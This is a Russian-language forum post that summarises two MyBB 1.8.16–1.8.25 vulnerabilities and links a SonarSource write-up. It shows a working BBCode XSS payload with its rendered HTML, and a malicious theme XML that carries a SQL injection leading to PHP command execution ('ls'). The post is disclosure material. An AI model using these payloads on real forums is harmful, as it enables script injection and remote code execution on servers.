Уязвимости в MyBB
#1
В MyBB версий 1.8.16 - 1.8.25 выявлены две уязвимости.

1. Из-за ошибки в преобразователе тегов возможны двойные URL:
 
Код:
[img]http://xyzsomething.com/image?)http://x.com/onerror=alert(1);//[/img]
Что преобразуется в
 
Код:
<img src="http://xyzsomething.com/image?)<a href=" http:="" x.com="" onerror="alert(1);//&quot;" target="_blank" rel="noopener" class="mycode_url">

2. Возможны SQL-инъекции через шаблоны оформления:
 
Код:
<?xml version="1.0" encoding="UTF-8"?>
<theme name="Default" version="1821">
   <properties>
      <templateset>') AND 1=0 UNION SELECT title, '${passthru(\'ls\')}' from mybb_templates -- </templateset>
   </properties>
</theme>
Данный шаблон выполнит ls на сервере.

https://blog.sonarsource.com/mybb-remote...tion-chain
It's time to kick gum and chew ass. And i'm all out of ass.
Ответ


Перейти к форуму:


Пользователи, просматривающие эту тему: 1 Гость(ей)